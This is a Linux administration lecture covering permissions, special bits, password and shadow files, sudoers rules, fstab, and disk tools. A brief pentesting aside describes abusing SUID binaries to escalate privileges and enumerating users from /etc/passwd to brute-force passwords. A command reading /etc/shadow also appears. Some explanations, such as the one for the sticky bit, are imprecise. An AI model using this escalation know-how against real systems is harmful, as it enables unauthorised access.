A classic example of a file that should be off-limits to everyone who falls into others is /etc/shadow, which holds the password hashes of all the users in that environment.
Even if somebody isn't the root user, and even if they're not in the administrators group, if they're in marketing, say, they fall into the others category, and they should not be able to read that file. This is very important to understand: some files should be off-limits even to people who aren't guests, even to senior executives of the company; a large number of people should never have access to /etc/shadow, because it contains the password hashes for every user that exists on the system.

Now, the way permissions are designed, they go by read, write, and execute, abbreviated r, w, and x. Read means you can view the contents of the file or directory; write means you can modify or delete the file or directory; and execute means you can actually run the program or script, or access that specific directory. So: rwx, keep those in mind.

Here's what it looks like when you view the permissions of a given file or directory, using this particular example. The first character indicates the type of entry: if it's a dash, it's a regular file; if it's a `d`, it's a directory. In this case we're looking at a file; if that first character were a `d`, this would be a directory. The next three characters represent the owner's permissions. Here they are `rw-`: the owner can read and write; the third slot, which would be `x`, is a dash, so there's no execute permission; it's probably not an executable file, just read and write. Those three characters are all the permissions for the owner who created this particular file. The next three characters represent the group's permissions, in this case `r--`: the group can only read the contents of this file; they can't write to it, and there's no execute permission on it either. And the last three characters represent the others permissions, which in this case are also `r--`: read, with no writing or modifying and no executing.

So that's the template: the very first character says file or directory (a regular hyphen means file, a `d` means directory), the next three characters are the owner's permissions, the next three are the group's permissions, and the last three represent every other person. That's the frame you're reading whenever you view the permissions of a file.
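As a sketch, here's how a listing like that appears in practice (the owner, group, size, and date are illustrative):

```bash
$ ls -l example.txt
-rw-r--r-- 1 alice developers 1024 Jan 10 09:30 example.txt
# ^ ^  ^  ^
# | |  |  └─ others: read only
# | |  └─ group (developers): read only
# | └─ owner (alice): read and write
# └─ "-" = regular file ("d" would mean directory)
```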
Now say you want to change the permissions of any given file or folder. We've already touched on this: you run `chmod`, change mode, and `+x` adds executable permission, as in the earlier example. Here, though, we've specified `u`, the user, so `chmod u+x filename` gives the file's user (its owner) execute permission on that file. That's the symbolic method of changing permissions; there's also a numeric method, which we'll cover right now.

Octal values work differently. Take 755: the 7 represents the maximum permission, read, write, and execute, for the user; the first 5 is read and execute for the group; and the second 5 is read and execute for everybody else. The values break down like this: read is worth 4, write is worth 2, and execute is worth 1. If you have all three, read, write, and execute, the value is 7; if you can only read, the value is 4. So 744 means the user can read, write, and execute, while the group and everybody else can only read. A zero means no permissions at all: 740 means the owner has read, write, and execute, the group has read only, and the others category has nothing. That's the breakdown of the numeric values: read = 4, write = 2, execute = 1. And the three digits in a command like `chmod 755` represent, in order, the owner, the group, and others; if it were 777, the owner, the group, and everybody else would all have read, write, and execute. So keep in mind there's the numeric method of modifying permissions and the symbolic method.

Along with changing permissions, we can also change ownership, with `chown` and `chgrp`, and you can probably guess what these mean: `chown` stands for change ownership and `chgrp` stands for change group; both are typically run with sudo. With `chown` you change the file's owning user, and you can set the owning user and group at once; with `chgrp` you change just the group of the file name you give it. In the first example, you're changing ownership of the file to a particular user and group; in the second, you're changing the file's group to whatever group name you supply.
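A sketch of both methods side by side (file names are placeholders):

```bash
chmod u+x script.sh      # symbolic: add execute for the owner
chmod 755 script.sh      # numeric: rwx for owner, r-x for group and others
chmod 740 secrets.txt    # rwx owner, r-- group, no access for others

sudo chown alice:developers report.txt   # change owner and group together
sudo chgrp developers report.txt         # change the group only
```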
fairly simple it’s like fairly intuitive as far as the commands are concerned but you can and again just keep this in mind so once the file name has been assigned to this particular group that means now all of the permissions that are inside of this group are now applied to this file name and anybody who is inside of this group has all of those permissions on this particular file this is what’s very important to understand okay when you change the owner then you’re changing all of the permissions of this owner to this file name so if they have the permission and typically it’s everything they have all the permissions or whatever the main permissions are so you change all of the permissions of that owner to this file name if you’re changing the group of this file name everybody inside of this group has access to that file name and they have the permissions for that group over this file name so just keep this in mind it’s very important and then we have special permissions so suid sgid and the sticky bit so um when the Su ID when the set user ID when that permission is set that file will execute with the Privileges of the owner not the user that’s running it so this is very important to understand if the owner has administrator privileges and the set user ID the Su ID has been set on that file if the user so the user is not the owner right so whoever the user is when they run that file when they if it’s a script for example when they run that thing they’re running with the permissions of whoever the owner was that was created it it’s very simple and it’s it’s very uh powerful to understand okay you are setting the execution privileges of that file to be the execution privileges of the owner and not the user the user could be lower privilege the owner could be an admin and if the user is running it they are running it with the Privileges of the admin which is the owner so if you want to change an add that specific specific permission to the file you would do the change mode chod and then you add on the user level the S permission right here which is the suid and then you give the path to whatever the file or directory is so this is very much for things that are executable that everybody else should be able to uh access meaning a binary so a binary for example the password binary inside of the user bin so this is for the user binary not the the binary of the entire system so just keep that in mind so this is the users’s binary for their password allows regular users to change their password securely that’s what this specific binary allows them to do because we already established that the password binary allows somebody to change somebody’s password so if the user wants to be able to change their own password they should have the permission to be able to do that so this is what this does and this is the case that it would apply to and you just got to be you got to keep in mind that this is a security issue okay so if this is a system binary and this is again something that we’ve done a lot in pentesting we search for files by the permission that is set so if they have suid permission on that given binary or on that given folder we’re going to try to go ahead and access that folder and drop some kind of a exploit in there a payload in there so that we can run that payload Lo by the permissions of the administrator for example and so if we if that directory has admin privileges and we have a shell that we want to execute and we want to switch oursel to the admin privileges we can then run 
everything that’s inside that directory because it has the S permission set and then now we’re running it with the admin privilege which means we can execute as an admin and then give oursel access to that system as an administrator so this is very important to understand okay that may have been a little bit confusing that last piece may have been confusing but what you need to really understand is that suid will execute the Privileges of the owner not the user that’s running it so the user could have no permissions to do anything but the suid has been set on that file or folder and now they can run it as that owner right just keep that in mind SG ID is very similar except it applies to the group so it executes with the permissions of the files group and not necessarily the person that’s running it so for directories files that are created inside of that specific uh directory are going to run with the parent directories group so whoever the group is that owns that particular directory any file that’s dropped inside of that directory will run with the permissions of that specific group so if you want to change and add this specific feature for permission for any kind of a directory this would be it you would do G Plus s and that’s it and this is a CH mod that is done with pseudo by the way this is not something that typically would be done by everybody so a a lower level user should not be able to add the special permissions to these things uh this should only be something that’s allowed to be done by somebody who has administrator or root privileges so that we know that it’s the right person that’s making these changes so and everybody should not be able to make uh the special permission or modify the special permissions on files it should only be reserved for root administrators and domain administrators so on and so forth and then there’s something called the sticky bit so when you set a sticky bit on a directory only the file owner or directory owner can delete or modify the files within it regardless of the group or other right permissions or anything else right so only the owner of that file or directory can delete or modify it nobody else can do it this is called a sticky bit and so you do chod plus T you’re adding the sticky bit so just T you’re adding that to whatever the path of the directory or file is uh this is commonly used in shared directories like the temp folder so the the file owner or the directory owner can delete or modify the files within the temp folder regardless or of the group or other right permissions that may be assigned to that temp folder right so only the owner of the temp folder or the owner of the temp directory can delete or modify the files within that directory doesn’t matter who else is trying to do it uh doesn’t matter what other group or WR permissions exist only the owner can delete or modify the files within that directory so this is something else to keep in mind because this is also a security issue so if there’s a sticky bit that’s been assigned to something it’s also something to keep in mind and it’s typically something that you do uh to make more SEC like make the environment a little bit more secure so this is opposite of the the special permissions where it technically makes it less secure if something has the special permission attached to it any user can run it with the owner’s uh permissions or with the owner’s privileges whereas the scky bit only allows the owner of that file or directory to be able to modify meaning change or write to 
Which brings us, finally, to user authentication and sudo permissions. We have already touched on /etc/passwd: it stores all of the user accounts, but despite the name there are no password hashes or plaintext passwords in it (the name is misleading, arguably by design). Each line corresponds to a single user account and contains several fields separated by colons. Take an example entry for alice. The first field is the login name. The second is the password placeholder, an x standing in for the hash that actually lives in the shadow file. Then come the user ID, a unique numerical identifier, and the primary group ID, which here points at the personal group created along with the user. Next is the GECOS field, a comment slot for optional information such as full name and office number, then the path to the user's home directory, and finally the default shell assigned to the user.
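Reconstructed as a concrete line (the UID, GID, and GECOS values are invented for illustration):

```bash
$ grep '^alice' /etc/passwd
alice:x:1001:1001:Alice Smith,Office 12:/home/alice:/bin/bash
# alice         login name
# x             password placeholder (real hash lives in /etc/shadow)
# 1001:1001     UID and primary GID (here, alice's personal group)
# Alice Smith,Office 12   GECOS comment field: full name, office, etc.
# /home/alice   home directory
# /bin/bash     default login shell
```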
Then there is the /etc/shadow file, which holds everything /etc/passwd leaves out: the encrypted password hashes and the other details related to password management. It is correspondingly more secure: while many users can read /etc/passwd, /etc/shadow is readable only by the root user, precisely because it contains every user's password hash. Looking at the same alice entry there (the hash value itself is massive, spanning two lines on the slide), the colon-separated fields are:

- Username: alice.
- Password hash: this field contains the hash along with details about the hashing algorithm and any salt used. The leading $6$ identifies the algorithm, in this case SHA-512 crypt.
- Last password change: 18661, the date of the last change expressed as days since January 1, 1970, so you count 18,661 days forward from that date to find when the password was actually changed.
- Minimum password age: 0, the number of days a user must wait between changes. Zero means no waiting at all; they could change their password daily if they wanted to.
- Maximum password age: 99999, the number of days until the system forces a change. Almost 100,000 days is effectively never, which is a security issue: you would typically set this to 90 or 120 days so there is a definitive limit on how long the same password can survive.
- Warning period: 7, the number of days before expiry that the user is warned. With a 90-day maximum, on day 83 the user is told they have 7 days to change their password.
- Password inactivity period: the number of days after expiry during which the account is still usable. Empty here, so as soon as the password expires the user must change it before the account works again.
- Account expiration date: the day the account is disabled, again counted as days since January 1, 1970. Also unset here, because as long as the account exists and has not been deleted it simply does not expire.
- Reserved: the final field is kept for future use.

That is the full explanation of a line in the /etc/shadow file. As for security considerations: /etc/passwd can be world-readable because the password placeholder is just an x, which makes it far less sensitive. Personally, I still think it should not be world-readable, because lower-privileged users then get every username on the system; in plenty of pentesting exercises we have enumerated users from exactly this file, brute-forced some of their passwords, moved laterally, and eventually escalated to higher privileges. But with the hashes replaced by x it is, technically, fine. /etc/shadow, however, must be readable only by root, or by the small handful of root-level people a company keeps for redundancy when someone is out sick. There is no reason to hand out root just so staff can help users: an IT administrator on the sudoers list can reset a locked-out or expired user's password without ever seeing a hash. These are the major security considerations around these two files.
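Putting the whole line back together (the hash is shortened and invented; real ones run much longer), plus the chage command, which is the usual way to enforce the 90-day maximum discussed above:

```bash
$ sudo grep '^alice' /etc/shadow
alice:$6$rounds=65536$Xy1...$kQz...:18661:0:99999:7:::
# $6$...   hash field: SHA-512 crypt, with rounds and salt parameters
# 18661    last change, in days since 1970-01-01
# 0        minimum password age (can change any time)
# 99999    maximum password age (effectively never expires)
# 7        warn the user 7 days before expiry
# :::      inactivity period, expiration date, reserved -- all unset

# Tighten the maximum age to 90 days (-M = max days between changes)
sudo chage -M 90 alice
```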
That brings us to managing sudo permissions. Granting users the ability to execute commands with root privileges via sudo is a critical aspect of system administration, not least because you want redundancy among your administrators rather than everything depending on one person. It involves adding people to the sudo group, configuring the sudoers file, and applying command restrictions for fine-tuned access control. Someone in the sudo group can run sudo and do essentially anything a root user could: they may not be root, but they inherit those higher-level privileges, and the sudoers file is where the highest level of privilege on the system is handed out.

Adding a user to the sudo group is as simple as sudo usermod -aG sudo username: usermod modifies the account, and -aG appends the sudo group to the user's group list. It is a very simple command, and a very powerful one; whoever you name now has the keys to the kingdom, so to speak. The same syntax adds a user to any group: just replace sudo with the group name.

The fine-tuning happens in the sudoers configuration file, located at /etc/sudoers, which controls sudo permissions for users and groups, down to the specific commands they may run with sudo. To edit it you use sudo visudo, the safer way to edit the sudoers file: it opens the file in your default editor while checking for syntax errors before saving, which is why you do not simply open it in Nano or Vim.

Once inside the sudoers file, you can define exactly what people can run. Giving alice full sudo access looks like alice ALL=(ALL:ALL) ALL: the first ALL grants sudo from any host or terminal, the (ALL:ALL) in parentheses lets her run commands as any user and any group, and the final ALL lets her run every command. She is being granted full sudo access.
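The commands themselves, with alice as the example user:

```bash
# Append (-a) the sudo group to alice's supplementary groups (-G)
sudo usermod -aG sudo alice

# Confirm the membership took effect
groups alice

# Safely edit /etc/sudoers; visudo syntax-checks before saving
sudo visudo
```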
Granting sudo access without a password goes a step further: you add the NOPASSWD tag to the entry, and now it really is the entire kingdom, on all hosts, as any user, no password required, every command.

What you will most likely do instead is restrict access to specific commands. The entry keeps the same shape, but the final field lists the full binary paths the user may run, separated by commas: the path to the systemctl binary, the path to the reboot binary, and so on. Specifying the binary path is how you pin down exactly which commands are allowed, so an entry naming /usr/bin/systemctl means alice can run systemctl with sudo, without a password, and nothing else.

A few practical examples to close the loop: add the user bob to the sudo group with sudo usermod -aG sudo bob; edit the sudoers file with sudo visudo so the system checks your syntax automatically; and define command restrictions for fine-tuned access control. You do not want to hand out ALL=(ALL:ALL) ALL. Get the user into the sudo group, open the sudoers file with visudo so your syntax is correct, and give them only the specific binary paths they need. That way the user has the permissions necessary for their administrative tasks while security is maintained. Security gets its own chapter later, but notice how the concepts are stacking up: file permissions, group membership and the permissions it confers, and now the ultimate group, sudo, with individual command limits applied through the sudoers file.
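A sketch of the three kinds of entries inside the sudoers file; the binary paths can vary by distribution, so check them with `which systemctl` and `which reboot` before copying:

```
# Full access: from any host, as any user and group, any command
alice   ALL=(ALL:ALL) ALL

# Full access with no password prompt: the entire kingdom
alice   ALL=(ALL) NOPASSWD: ALL

# Restricted: only these binaries, identified by full path
alice   ALL=(ALL) NOPASSWD: /usr/bin/systemctl, /usr/sbin/reboot
```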
From there you simply declare which commands each person can run: user, host, NOPASSWD or not, and the binary path, so that this one command is all they have sudo access to rather than a careless blanket ALL, which would be silly on our part as system administrators. Consider that your final cheat sheet for permissions and sudo, and let's jump into the next piece: file management and file systems.

First, the Filesystem Hierarchy Standard (FHS) and the directory structure, as a review. The FHS defines the directory structure and contents in Linux, which keeps things consistent across distributions, so you will see the same key directories in pretty much every distro: the root directory at the top, then the binaries, /etc, /home, /var, /tmp, and so on. None of this is news unless you skipped the section near the beginning where we walked through the hierarchy, and plenty of other directories hang off these primary ones. If you revisit the partitioning material from chapter 3, with its primary, extended, and logical partitions, it leads directly into the concept of mounting and unmounting file systems.

Mounting a file system means attaching it to a directory so that it becomes accessible within the larger directory tree, and you do this with the mount command. Whatever the file system is (XFS, FAT32, or any of the others), you attach it to a given directory in your hierarchy, and from then on it is reachable through the OS for whoever is using the machine.
To do that you use the mount command, with sudo in front as the qualifier: sudo mount, then the device name, then the mount point it will be attached to. You find the device name under /dev; as we covered during the installation part of chapter 3, you can list the devices currently plugged into the system, and the path is nothing complicated, just /dev/ plus whatever name the system assigned. An option like -t specifies the file system type, ext4 for instance. So in an example like sudo mount -t ext4 /dev/sdb1 /mnt, the device sdb1 breaks down as: sda would be the first physical disk, sdb is the second, sdc would be the third, and the trailing 1 is the first partition of that disk. We are mounting the first partition of the second disk onto the /mnt directory and telling the system to treat it as ext4. There are various other options, and, as I keep reminding you, we will run all of this in the practical portion.
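As a sketch (device names and mount points depend on your machine):

```bash
# Manually mount the first partition of the second disk as ext4 onto /mnt
sudo mount -t ext4 /dev/sdb1 /mnt

# List block devices, their names, and current mount points
lsblk

# Look up the partition's UUID for use in /etc/fstab later
sudo blkid /dev/sdb1
```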
That is considered a manual mount, and sometimes that is exactly what you want. But you can also declare automatic mounting, which is done in the /etc/fstab configuration file: it defines all the file systems that should be mounted automatically when the system boots, so the handful of file systems and partitions you use regularly do not have to be mounted by hand every time. Each line in fstab represents one file system and the mount options attached to it, in six fields: the file system, the mount point, the type, the options, the dump flag, and the pass order.

The first field identifies the file system, and there are several ways to fill it in. A device path such as /dev/sda1 refers to the first partition on the first SATA drive: sd for the drive, a for the first one, 1 for its first partition. A more robust way is UUID=, giving the partition's universally unique identifier instead of its path; that obviously requires knowing the UUID, which the commands we ran earlier to list partitions will show you. You can also use LABEL= with a label name, which is different from both the UUID and the partition path; the label is what you see when you plug in, say, an external SanDisk drive, and you can rename it. I always rename mine: one word with no spaces, an acronym I understand plus the size, something like PRIMARY2TB, so I know exactly which external disk I am dealing with. Finally, a server:/share path covers network file systems such as NFS or SMB/CIFS, where the data sits on a remote file server and the connection path to that server goes in this field.

The second field is the mount point, the directory the file system will be mounted on. It could be the root directory itself, a path under /home, or /mnt/data, which is the typical mount point for additional data drives. All of the users' home directories are mounted under /home, and each user would need an entry in the /etc/fstab configuration file assigning their home directory under that path.
This is done once in fstab, and as soon as the system boots, everything is mounted and accessible. You do not want to be doing it manually every time, especially with dozens, hundreds, or thousands of employees: once an environment is that big, with perhaps a dozen new hires a week, the fstab entries are generated by a script, which is far faster and avoids manual errors.

So we have where the file system lives and where it should be mounted; the third field is the type of file system we are dealing with, which the system needs in order to know how to interact with it. We have covered these types already: ext4 is the most common, the Linux standard for personal computers and small environments. xfs is the high-performance file system usually found on file servers and web servers; if such a server is accessed remotely from machines in another city, the first field would carry the network connection path rather than a local device, and the type would be nfs, the network file system. If you are internal and hardwired to it, you would use xfs as the type; accessed over the network, it is nfs. And vfat is one of the variations of the FAT family (FAT32 and so on), often used for USB sticks and external hard drives attached over USB or FireWire.

The fourth field holds the mount options that control how the file system is mounted, and multiple options can be attached. Writing defaults applies the default set, which is rw, suid, dev, exec, auto, nouser, and async, all at once. Beyond that there is noatime, which prevents the file system from updating access times, ro, which mounts it read-only, and rw, which mounts it read-write, as in the example shown here.
There is a variety of further options, so let me quickly run through what all of them do:

- defaults: includes everything in the list above; an example entry like /dev/sda1 mounted on the root as ext4 with defaults picks up all of those individual options as one word.
- rw: read-write mode, so anyone who gets access can both read and write.
- ro: read-only.
- noexec: prevents the execution of any binary on the mounted file system (its counterpart exec, in the defaults, is what permits it).
- nosuid: disables the set-user-ID and set-group-ID bits we discussed in the previous section, so nothing on this mount runs with the privileges of its owner or creator.
- nodev: does not interpret character or block devices on the file system. In practice, users cannot create device nodes within that directory structure, which enhances security by restricting access to device-management functions on the mounted partition. Recall how /dev exposes a file structure for a printer driver or a USB drive; nodev means none of that is allowed on this particular mount.
- noatime: does not update the access time on files when they are read (the little piece of metadata recording when a file was last opened), which can improve performance.
- nodiratime: the same, but for directories.
- relatime: updates the access time only if the stored access time is older than the current modify time (or is sufficiently stale), which improves performance while keeping some of the atime functionality, for example enough for tools that need to know whether a file has been read since it was last changed.
- user: allows a normal user, someone who is not an administrator or on the sudoers list, to mount the file system.
- nouser: only the superuser (root, an administrator, or someone on the sudoers list) can mount it; this one is in the defaults.
- auto: mounts the file system automatically at boot; also among the defaults, along with dev (device nodes are interpreted) and suid (SUID bits are honored).
- noauto: prevents automatic mounting at boot.
- sync: all input/output operations are performed synchronously, meaning the computer must wait for each operation (reading a file, writing to the network) to finish before continuing with other tasks.
- async: I/O is asynchronous; the program can issue an I/O request, keep executing other code while the operation happens in the background, and receive a notification when it completes. That is genuinely useful, which is presumably why async is one of the defaults.
- acl: enables access control lists for the file system, so whatever ACL configuration exists on your system applies to this partition as well.

As an example entry: /dev/sda1, the first partition of the first SATA disk, mounted on /mnt/storage as ext4 with defaults,noatime, followed by 0 and 2. Those two numbers are the dump and pass fields: a dump of 0 marks a file system that should not be dumped, and the pass value sets the order in which file systems are checked at boot, so this one is checked second in line. For dump there are only two possible values, 0 for do not dump and 1 for dump the file system.
The dump parameter is a backup-style feature: it indicates whether the file system should be backed up by the legacy dump utility, with 1 meaning it is included in those backups and 0 meaning it is skipped. (Despite the name, it has nothing to do with copying data between mount points at boot.)

Pass is the order in which file systems are checked at boot time by the fsck utility, and it takes three values: 0 means do not check it at all; 1 means check it first, which should be reserved for the root file system and nothing else; and 2 means check it after the first has been checked, which is what you assign to essentially every other file system mounted on the machine, since they all come after the root file system.

Putting it together, here is an example /etc/fstab with the columns we have covered: the file system itself, the mount point, the type, any options, the dump flag, and the pass order.
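A reconstruction of the example discussed next; the UUIDs are placeholders for whatever blkid reports on your own system:

```
# <file system>      <mount point>  <type>  <options>         <dump> <pass>
UUID=aaaa-1111-...   /              ext4    defaults          0      1
UUID=bbbb-2222-...   /home          ext4    defaults          0      2
UUID=cccc-3333-...   none           swap    sw                0      0
/dev/sdb1            /mnt/data      ext4    noatime           0      2
```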
Walking through it: the first entry, identified by UUID, is mounted onto the root. This is a standard entry, since root has to be mounted every single time the machine boots: ext4, default options, dump 0, and a pass of 1 so it is checked before anything else. The second entry is /home, which carries all of our users' home directories: ext4 again, all the defaults, no dump required, checked second in line after root. Then comes our swap space; if you remember the swap partition from the partitioning section, this is it: type swap with the sw option, no dump because swap is wiped every time the system reboots, and pass 0 because at boot, which is exactly when fstab is processed, the swap space is empty, so there is nothing for fsck to check. Last is /dev/sdb1, one of our secondary disks, mounted onto /mnt/data: ext4, with just noatime instead of the defaults, dump 0 because we do not want to back it up, and pass 2 so it is checked after root. Notice that if this list were longer, everything else would also get a pass of 2, with swap the lone exception, and only the options column would vary. The slide spells out each field of this example, so pause and take a screenshot if you want the notes. Moving on.

Unmounting a file system is the other thing you will need to do, and it is typically done manually rather than through the fstab configuration: sudo umount followed by the mount point, or sudo umount followed by the device name. Either works, because each identifies the same mount.
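Both forms, plus a way to see what is holding a mount open (the paths are illustrative):

```bash
# Unmount by mount point...
sudo umount /mnt/data

# ...or by device name; either identifies the same mount
sudo umount /dev/sdb1

# If umount complains the target is busy, list the open files on it
# (when given a mount point, lsof reports everything open on that file system)
lsof /mnt/data
```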
That is the command for unmounting, and it is a crucial step to prevent data loss or corruption, especially for removable storage devices like USB drives. In a graphical user interface you would typically right-click and unmount, or click the eject button next to the device; on the many Linux servers that run with a command line only and no GUI, umount is how you do the same thing, making sure everything that needs saving gets saved. And just as on Windows or macOS, if a file on that partition (on that USB drive, say) is open and unsaved, you will usually get a notification that something on the drive is in use and needs to be saved and closed before you unmount. I will admit I sometimes pull a drive straight out of the USB port, but only when I know for a fact that every file is closed and everything I need is saved; if something has not been saved or is still in use, save it, close whatever software is using it, and then you can unmount without any problems.

To articulate the reasons to unmount properly: first, buffered writes. Operating systems use a process called buffering to improve performance: instead of writing data to disk immediately, they temporarily store it in RAM, which is volatile memory that gets wiped when the system reboots. Unmounting takes all the buffered data hanging in limbo and actually writes it to the disk, so you do not lose any of it. Second, flushing the cache, another temporary holding area for data: unmounting ensures any pending write operations are completed and the data is accurately transferred onto the storage device itself. Third, the integrity of the file system: a clean unmount closes the file system properly and leaves its data and state consistent and uncorrupted. It is a good habit: modern USB drives are resilient, and a single careless removal will most likely be fine, but do it repeatedly and the integrity of the file system can suffer; corruption may be a strong word, but the drive may stop performing or saving reliably.
But a network file system is another matter. If you remove or disconnect one without properly unmounting, data that was in transit really can be lost: it is no longer on the server you were pulling from and never arrived on your machine, so it is stranded somewhere in the middle of the connection. Losing that in-flight data can make files unreadable; it will most likely not destroy the file system itself, but you will lose whatever was in transit, and you just do not want that.

Then there is preventing access conflicts: files may be locked, and a process might still be interacting with the file system, so unmounting ensures all file handles are closed and nothing is still using it. This is what I was referring to earlier about software holding files open. When I am editing video, all my footage lives on an external drive so it takes no space on my machine, and if Premiere Pro still has raw files or my project file open and I try to eject, the computer refuses: "disk can't be ejected," because a program is still using it in some capacity. I could still physically pull it out, but I might lose my last autosave or damage some of my video files, so instead I save, close Premiere, and then eject cleanly.

Finally, shared resources, again on network-connected file systems: multiple users or systems may be accessing the same resources, and unmounting properly manages them and prevents the issues that arise from unexpected disconnections, making sure everyone on that shared resource is either notified or has their work saved, because everybody is working on something that matters to the organization. Again, in my view network file systems are much more volatile and sensitive than USBs in this respect, precisely because the data rides on a network connection, so be especially disciplined about unmounting them. Here are some sample commands:
The first form uses the device name; the second uses the mount location itself, and the same pattern works for a network file system: umount followed by the path it's mounted on. It's very, very simple.

In summary for this section: unmounting flushes the buffers, maintains integrity, prevents conflicts, and closes all file handles and processes. Unmounting correctly safeguards your data and the reliability of the file system, so always unmount before physically disconnecting a USB drive or network share.

Now that we understand mounting and unmounting and why those two actions matter, let's talk about actually managing disks with the various partitioning tools. fdisk (from "fixed disk") is a command-line utility used to create, modify, or delete partitions. You run it with sudo, pointing it at the individual disk you want to partition: sudo fdisk followed by the path of the physical disk (this can be done with a USB drive as well). That opens the disk for partitioning, and you can substitute any device you want to work on. Inside fdisk, the common single-key commands are:

p prints the current partition table, showing all the existing partitions on the disk. We ran something very similar earlier, while installing Linux, to find out what our partitions were.

n creates a new partition. You'll be prompted to choose a primary (p) or extended (e) partition, then the partition number and the starting and ending sectors (or a size).

d deletes an existing partition; you'll be prompted for the partition number to delete.

w writes your changes. This is the big one to keep in mind: whatever edits you make, creating, deleting, or modifying partitions, nothing is saved unless you write it before you exit. You could do all that work and lose it by quitting without pressing w.

a toggles the bootable flag on a partition, marking it active in the partition table so it can be used for booting when the computer starts up.

Here's a sketch of a full session.
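A minimal example workflow, assuming the disk is /dev/sdb (replace it with your own device); everything after the first line is typed at the fdisk prompt:

```bash
sudo fdisk /dev/sdb   # open the disk for partitioning

# At the fdisk prompt:
#   p          print the current partition table
#   n          create a new partition
#   p          choose primary (or e for extended)
#   1          partition number
#   <Enter>    accept the default first sector
#   <Enter>    accept the default last sector, or give a size like +10G
#   a          (optional) toggle the bootable flag
#   w          write the changes and exit; without this nothing is saved
```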
So the workflow is: open the disk with fdisk, press p and Enter to print the partitions (you're inside fdisk's interactive mode at this point), press n and Enter to create a new partition, choose p for primary or e for extended, specify the partition number and sectors, and finally press w and Enter to write the changes, after which you can exit fdisk safely knowing all the work you've done is saved.

lsblk. You should be familiar with ls, because we already covered it in our introduction to the command line; blk stands for block devices, so lsblk lists the block devices. It displays information about all the available block devices, the disks and their partitions, in a tree-like format, giving you a clear overview of the system's storage configuration: device names, types, sizes, mount points, and every other piece of data relevant to understanding what your disk structure and partitions look like. The basic usage is literally just typing lsblk and pressing Enter.

In a typical output you'll see columns like NAME, MAJ:MIN, RM, SIZE, RO, TYPE, and MOUNTPOINT. In our sample output there's a first physical disk with three partitions, then a second disk with one partition, the mount point locations for each, and one entry that is a swap space. Here's what the columns stand for:

NAME is the device name, as we've already established.

MAJ:MIN are the major and minor device numbers (8:0, 8:1, and so on).

RM indicates whether the device is removable: 0 means non-removable, 1 means removable.

SIZE is the size of the device.

RO indicates whether it's read-only:
0 means read-write and 1 means read-only.

TYPE is disk for a whole disk, part for a partition, or rom for read-only memory; a swap area shows up with [SWAP] as its mount point, as we just saw.

MOUNTPOINT is the path where the device is mounted.

With extra options you can also get FSTYPE, the file system type; UUID, the universally unique identifier; and LABEL, any label that has been attached, like "backup" or "data".

In our example output you can see the MAJ:MIN numbers; the RM column (the internal disks are not removable, the external one is); the sizes; the RO column showing that nothing is read-only; the types alternating disk, partition, disk, partition; and the mount points, including the swap entry.

To get the FSTYPE, LABEL, and UUID columns you run lsblk -f, which gives the full file-system view of all the block devices. That output drops a few of the other columns but adds the UUID, the label, the mount point, and the file system type in their place.

If you want specific columns printed to the screen, use the -o option followed by the names of the columns you want, written in capital letters, for example NAME,SIZE,FSTYPE,MOUNTPOINT; you can customize the output however you like. And the -d option displays information about the whole disks only, excluding their partitions, so the partition rows disappear and you only see the disks themselves.

Quick summary: lsblk provides a detailed tree view of your devices; with -f it includes file system information; and with -o it's customizable, so you can view exactly what you want in the output. That is the list block devices command.
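All four variations in one place; these are standard lsblk flags:

```bash
lsblk                                  # tree view of all disks and partitions
lsblk -f                               # add FSTYPE, LABEL, and UUID columns
lsblk -o NAME,SIZE,FSTYPE,MOUNTPOINT   # only the columns you name
lsblk -d                               # whole disks only, no partition rows
```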
mkfs. Very similar in spirit to mkdir, mkfs is the "make file system" command: it formats a partition with a specified file system type. Much like dotted names in Python, you use a dot to declare which type of file system you want to create, so sudo mkfs.ext4 on /dev/sda1 creates an ext4 file system on the first partition of the sda disk.

The xfs file system is a high-performance file system known for its robustness; sudo mkfs.xfs creates one the same way.

For FAT32 you actually declare the vfat type (I love saying "the vfat type of a file system") and add -F 32 for the 32-bit variant. These are the older file systems typically used for USB drives, and they're widely supported, meaning you can use them on Windows as well as macOS and so on, but they're limited in the amount of space they can tolerate, which is 2 terabytes, as we discussed earlier in the training. They're a little slower and a little older, so this is mostly for USB drives or anything maxed out at 2 TB. Instead of putting fat32 after the dot, you say vfat and add -F 32; the rest stays the same.

NTFS is the New Technology File System, native to Windows, with advanced features like journaling and support for large files; formatting a partition with it is useful for Windows compatibility. That's mkfs.ntfs followed by the target location.

The example workflow: first identify the partition, using lsblk or fdisk -l to list your block devices, then choose the appropriate mkfs command for the desired file system type, for example mkfs.ext4 on that particular partition. So keep this in mind: you identify the partition with lsblk, then on the partition you've designated you create the file system that's going to be mounted, and after that's done you verify the file system type with lsblk -f.

In summary, mkfs is used to format partitions with different file systems (ext4, xfs, FAT32, NTFS, etc.), and you choose based on compatibility. To compare this to macOS: there's a GUI tool called Disk Utility that does the same job. You connect a USB or external drive, open Disk Utility, select the drive, go to Format, choose the formatting option you want, and finalize it. That's exactly what mkfs is doing from the command line: once you know where the drive is and what its device name is, you use sudo mkfs to format it as one of these file system types.
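The whole workflow as a sketch, assuming example partitions /dev/sda1 and /dev/sdb1; heed the warning that follows, since every mkfs call erases the partition's contents.

```bash
# 1. Identify the partition
lsblk                            # or: sudo fdisk -l

# 2. Format it (WARNING: this wipes whatever is on the partition)
sudo mkfs.ext4 /dev/sda1         # ext4, the common Linux choice
sudo mkfs.xfs /dev/sdb1          # XFS, high-performance
sudo mkfs.vfat -F 32 /dev/sdb1   # FAT32, for USB drives and cross-OS use
sudo mkfs.ntfs /dev/sdb1         # NTFS, for Windows compatibility

# 3. Verify
lsblk -f
```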
And to be completely, brutally honest, let me disclose this plainly: this wipes the file system, and in most environments it wipes everything on the drive. When you format a USB drive it cleans it out and deletes everything on there, because it has to rebuild the file system. So if there's anything on that disk you want kept, back it up before you run this command. Unless it's a brand new, empty USB drive, external drive, or freshly installed disk, back up whatever needs backing up first, because formatting will most likely destroy whatever is on there. Keep that in mind.

